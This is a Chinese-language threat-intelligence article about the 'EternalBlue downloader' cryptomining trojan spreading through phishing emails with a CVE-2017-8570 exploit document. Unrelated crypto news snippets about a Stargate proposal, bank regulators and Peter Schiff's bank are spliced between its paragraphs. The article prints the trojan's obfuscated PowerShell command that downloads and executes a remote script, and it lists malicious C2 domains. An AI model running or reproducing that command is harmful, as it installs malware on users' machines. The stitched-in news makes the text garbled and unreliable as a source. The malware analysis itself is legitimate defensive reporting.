来源:腾讯御见威胁情报中心
编者注:原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播,附件含CVE-2017-8570漏洞攻击代码》
“永恒之蓝”下载器木马在感染用户机器上运行后,会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档,该文档附带CVE-2017-8570漏洞攻击代码。
Stargate社区发起升级 Stargate EqReward设计提案,用户将无法获取额外eqRewards:5月29日消息,跨链桥 Stargate 社区针对此前推特用户 zhouzhou 提出的Stargate 疑似存在 Bug而导致的套利问题发起升级 Stargate EqReward 设计提案,要求(1)取消给予再平衡转账的折扣,使其支付较少的协议费(保持所有转账的协议费为 6-10 bps);(2)更新 feelibrary,使分配的最大 eqReward 是该途径的最大协议费(6-10 bps),这意味着再平衡协议用户将收到 0 费用,但不会因为这样做而获得额外的奖励。上述更新不会对 Stargate 核心协议产生实质性影响。通过修改 feelibrary,只返还费用而非提供奖励,用户将无法获取额外 eqRewards,允许协议保留更多的 eqRewards,并激励 Stargate 的持续平衡。该提案于 5 月 28 日 15:13 开启,5 月 31 日 15:13 结束。目前,已有 92.6% 的支持率。[2023/5/29 9:48:16]
如果被攻击用户收到邮件并不慎打开文档,就可能触发漏洞执行Powershell命令下载mail.jsp:
报告:银行业监管机构将数字资产视为对银行业和传统金融业安全构成威胁:金色财经报道,根据标准普尔市场情报公司 2 月 14 日的一份报告,银行业监管机构将数字资产视为对银行业和更广泛的传统金融业安全构成威胁。虽然美国机构尚未发布正式规则,但行业专家告知标准普尔全球市场情报,监管机构已明确表态。?
该报告提供了监管机构为处理加密资产的银行发布的指南的时间表。时间表始于货币监理署 2021 年发布的信函,该信函要求国家银行和储蓄机构披露其从事某些加密货币活动的意图,并为此获得 NOC。[2023/2/15 12:08:54]
C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)
比特币反对人士Peter Schiff的银行将被清算:金色财经报道,纽约时报称,黄金支持者、比特币反对人士Peter Schiff的银行将被清算。[2022/8/10 12:15:54]
而下载使用的域名ap35nf7.jp实际上并没有注册,但是依然能够解析到地址:t.awcna.com,是因为被感染机器的本地hosts文件被篡改,使得随机生成的域名映射到木马使用的恶意地址,细节请参考御见威胁情报中心此前发布的报告:《“永恒之蓝下载器”木马篡改hosts指向随机域名,再用多个漏洞攻击内网挖矿》。
本次攻击过程中,木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名,并在hosts文件中指向域名:
t.tr2q.com,t.awcna.com,t.amynx.com
mail.jsp经过高度混淆,多次解密后可以看到其安装多个计划任务下载Powershell脚本执行,并使用了新的计划任务名:
“Bluetea“蓝茶。
“永恒之蓝”下载器木马自出现之后从未停止更新,从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀,并且通过安装多个类型的计划任务进行持久化。在传播方式上,最初通过供应链攻击积累一批感染机器后,又不断利用”永恒之蓝”漏洞,MSSql爆破,$IPC爆破,RDP爆破等方法进行扩散传播,近期又增加了DGA域名攻击和钓鱼邮件攻击,其最终目的只为利用用户机器挖矿门罗币获利。
永恒之蓝下载器木马的历次版本更新参考下表:
安全建议
1.建议用户不要轻易打开不明来源的邮件附件,对于邮件附件中的文件要格外谨慎运行,如发现有脚本或其他可执行文件可先使用杀软件进行扫描;
2.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP账号密码,切勿使用弱口令,避免遭遇弱密码爆破攻击;
3.根据微软安全公告及时修复Office漏洞CVE-2017-8570,需进行漏洞扫描和修复,或采用WindowsUpdate进行。
IOCs
http//t.awcna.com/mail.jsp
郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。